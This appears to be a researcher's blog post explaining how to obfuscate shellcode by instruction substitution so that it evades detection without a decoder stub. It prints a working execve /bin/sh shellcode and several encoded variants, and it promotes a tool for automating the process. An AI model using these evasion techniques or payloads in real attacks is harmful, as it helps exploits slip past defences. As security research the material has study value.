The obvious solution is to encode the payload before sending it. A typical encoder yields a new payload that contains both, the old payload encoded and a decoder function to decode it.
Now, the encoded payload is "free" of any malicious patterns so it won't trigger any alarm, but what about the decoder? It becomes the weakest link and the new trigger for alarm.
Almost every encoding method requires a decoder to be embedded in the payload. The tricky part is how to encode the decoder so it won't trigger any alarm? And is it even possible?
The short answer is Yes, there are some ways to do it, one of them is instruction substitution. In other words, replacing an instruction with semantically equivalent, but different instruction.
But if instruction substitution is good enough for encoding decoders, is it not good enough for encoding the payload itself? Yes, it is good enough to encode the payload as well.
By applying instruction substitution on a payload, the result is, an encoded payload with no decoder in it. A decoderless encoded shellcode.
Let's take the following shellcode (execve "/bin/sh", 23 bytes) as an input:
.section .text .global _start _start: push $0xb popl %eax cdq push %edx push $0x68732f2f push $0x6e69622f mov %esp,%ebx push %edx push %ebx mov %esp, %ecx int $0x80The first instruction is:
push $0xbThe goal of this instruction is to store the byte 0xB in the stack. One way to encode this instruction will be:
push $0xc decb (%esp)This way, the value (i.e. 0xB) is no longer visible. Another way to encode this instruction will be:
sub $0x4, %esp movl $0xfffffff4, (%esp) notl (%esp)Here, the PUSH instruction is no longer visible. The reason I'm using 0xFFFFFFF4 (i.e. -12, ~0xB) and not 0xB is to avoid NULL bytes, but if NULL is not a problem then:
sub $0x4, %esp movl $0x0000000b, (%esp)Now, not only single instructions can be encoded. It's also possible to group a few instructions together and encode it. For example:
push $0xb popl %eaxThe goal of this instruction group is to store the value 0x0000000B in register EAX. One way to encode it will be:
movl $0xfffffff4, %eax xorl %eax, $0xfff31337This way, the value (i.e. 0xB, or 0x0000000B) is no longer visible. Another way to encode this instruction group will be:
pusha movl $0xfffffff4, 0x1c(%esp) notl 0x1c(%esp) popaHere, both, the referenced register (i.e. EAX) and the value (i.e. 0xB, or 0x0000000B) are not visible.
The advantage of this approach is that it can be recursive, each output can be used as input for another pass. For example:
push $0xbYields:
push $0xc decb (%esp)That can yield:
sub $0x4, %esp movl $0xfffffff3, (%esp) notl (%esp) decb (%esp)And so on.
The disadvantage of this approach is that it's not size-oriented (output might be bigger than input) and it will not work on all the instructions set (e.g. INT).
Several years ago I have developed and released a program in Python called shcfuscator (read: shellcode obfuscator) to automate this very process.
Shcfuscator takes an input assembly program in GAS syntax, substitutes popular instructions, and outputs an assembly program in GAS syntax.
Nothing much happened with it, and I didn't follow-up on it, until recently, when I thought about it again and decided to write this post.
So, if anybody is interested in porting it Metasploit as en encoder module, please let me know - I'd be happy to help out!
Following this legacy project, I have decided to open a repository for other legacy projects that I have developed in the early-mid 2000's
The repository can be found at: https://github.com/ikotler/tty64
I am not planning on maintain it, but nonetheless feel free free to fork.